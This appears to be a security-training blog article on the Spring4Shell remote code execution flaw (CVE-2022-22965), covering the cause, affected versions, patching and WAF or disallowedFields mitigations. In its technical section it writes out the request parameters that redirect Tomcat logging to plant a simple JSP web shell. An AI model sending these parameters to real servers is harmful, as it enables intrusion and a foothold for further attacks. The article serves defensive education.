Spring4Shell vulnerability details and mitigations
Spring4Shell, also known as SpringShell, is a remote code execution vulnerability (CVSS 9.8) published at the end of March 2022 that impacts Spring Framework. Some Java-based applications that use the Spring library may be vulnerable to the CVE-2022-22965. If an application is vulnerable, an adversary can access internal data, including databases, escalate into the internal networks, or gain access to valuable assets.
Learn Vulnerability Management
Technical details
This flaw occurs when objects or classes are exposed to special conditions. In detail, Spring translates the data of a received request (body and its parameters) into a domain object. The Spring library itself specifically manages parts of the object, including Class, ProtectionDomain, and ClassLoader, but the flaw is then introduced by changes on the Class object in Java 9.
The Spring exposes every time the class member of the target object, for example:
http://localhost:8080/path/targetapp?classThe Spring4Shell vulnerability occurs because the Spring framework exposes the class object and does not apply the best measures to restrict the access methods, namely the Java 9’s Class.getModule.
Looking at the Tomcat server as an example of exploration, the adversaries can use this flow to change the Tomcat logging directory, as shown below.
POST http://localhost:8080/path/targetapp?class.module.classLoader.resources.context.parent.pipeline.first.directory=
DIRECTORY_OF_CHOICEBy following this approach, the creation of a webshell on the server side is possible using the following commands:
class.module.classLoader.resources.context.parent.pipeline.first.directory=wtpwebapps/ROOT
class.module.classLoader.resources.context.parent.pipeline.first.prefix=shellshell
class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=
class.module.classLoader.resources.context.parent.pipeline.first.pattern= <% out.println(System.getProperty("os.name")); %>The result of the payload execution is a simple web shell; in this case, it writes the operating system name on the webpage.
Although this may seem like a simple scenario, adversaries can use it in the wild to deploy more sophisticated payloads, including web shells to execute arbitrary payloads, cobalt strike beacons and moving laterally over the internal network.
For instance, criminals are taking advantage of this vulnerability to attack IoT devices and spread the Mirai botnet. More details about this attack wave are here.
Vulnerable applications and affected versions
Some applications and software versions are vulnerable to the Spring4Shell vulnerability. This list should also be used to identify if specific services are vulnerable:
- Spring Framework versions before 5.2.20 and 5.3.18
- Java Development Kit (JDK) 9 or higher
- Spring-webmvc and Spring-webflux dependencies; and
- Use plain old Java objects (POJO) in Spring
Learn Vulnerability Management
How to mitigate the flaw
The best way to fix this vulnerability is to upgrade Spring Framework to 5.3.18 or 5.2.20 versions or higher. If upgrading is not possible, all the non-basic types, such as POJOs, must define what fields the application can use. You can find more information about this topic here.
Apache Tomcat should be upgraded to non-vulnerable versions 10.0.20, 9.0.62, and 8.5.78, as well. Also, using an older version of Java (up to Java 8) must be considered as a rule of thumb within this context.
More granulated conditions should be implemented, including:
- Changing the application code to include disallowedFields containing “class.*“, “Class.*“, “*.class.*“, “*.Class.*“
- Create new rules on WAFs to filter out requests containing the strings: “class.*“, “Class.*“, “*.class.*“, “*.Class.*“
Sources:
- Anatomy of the Spring4Shell, Dynatrace
- New SpringShell zero-day, ContrastSecurity
- CVE-2022-22965, TrendMicro
Learn Vulnerability Management
Build your vulnerability assessment and management skills with dozens of courses. What you'll learn- Vulnerability scanning
- Classifying and prioritizing
- Patching and mitigating
- Building a program
- And more
In this Series
- Spring4Shell vulnerability details and mitigations
- The most popular binary exploitation techniques
- Roadmap for performing an Active Directory assessment
- The importance of asset visibility in the detection and remediation of vulnerabilities
- Digium Phones Under Attack and how web shells can be really dangerous
- vSingle is abusing GitHub to communicate with the C2 server
- The most dangerous vulnerabilities exploited in 2022
- Follina — Microsoft Office code execution vulnerability
- How criminals are taking advantage of Log4shell vulnerability
- Microsoft Autodiscover protocol leaking credentials: How it works
- How to write a vulnerability report
- How to report a security vulnerability to an organization
- PrintNightmare CVE vulnerability walkthrough
- Top 30 most exploited software vulnerabilities being used today
- The real dangers of vulnerable IoT devices
- How criminals leverage a Firefox fake extension to target Gmail accounts
- How criminals have abused a Microsoft Exchange flaw in the wild
- How to discover open RDP ports with Shodan
- Time to patch: Vulnerabilities exploited in under five minutes?
- Whitespace obfuscation: PHP malware, web shells and steganography
- New Sudo flaw used to root on any standard Linux installation
- Turla Crutch backdoor: analysis and recommendations
- Volodya/BuggiCorp Windows exploit developer: What you need to know
- AWS APIs abuse: Watch out for these vulnerable APIs
- How to reserve a CVE: From vulnerability discovery to disclosure
- SonicWall firewall VPN vulnerability (CVE-2020-5135): Overview and technical walkthrough
- Top 25 vulnerabilities exploited by Chinese nation-state hackers (NSA advisory)
- Zerologon CVE-2020-1472: Technical overview and walkthrough
- Unpatched address bar spoofing vulnerability impacts major mobile browsers
- Software vulnerability patching best practices: Patch everything, even if vendors downplay risks
- What is a vulnerability disclosure policy (VDP)?
- Common vulnerability assessment types
- Common security threats discovered through vulnerability assessments
- Android vulnerability allows attackers to spoof any phone number
- Malicious Docker images: How to detect vulnerabilities and mitigate risk
- Apache Guacamole Remote Desktop Protocol (RDP) vulnerabilities: What you need to know
- Linux vulnerabilities: How unpatched servers lead to persistent backdoors
- Tesla Model 3 vulnerability: What you need to know about the web browser bug
- How to identify and prevent firmware vulnerabilities
- Will CVSS v3 change everything? Understanding the new glossary
- URGENT/11 vulnerability
- 32 hardware and firmware vulnerabilities
- The Zero Day Initiative
- CVE-2018-11776 RCE Flaw in Apache Struts Could Be Root Cause of Clamorous Hacks
- XML vulnerabilities are still attractive targets for attackers
- Broadpwn Wi-Fi Vulnerability: How to Detect & Mitigate
- Mobile Systems Vulnerabilities
- 10 Security Vulnerabilities That Broke the World Wide Web in 2016
- Most Exploited Vulnerabilities: by Whom, When, and How
- Exploiting CVE-2015-8562 (A New Joomla! RCE)
- Security vulnerabilities of voice recognition technologies
Get certified and advance your career
- Exam Pass Guarantee
- Live instruction
- CompTIA, ISACA, (ISC)², Cisco, Microsoft and more!
Vulnerabilities
Vulnerabilities
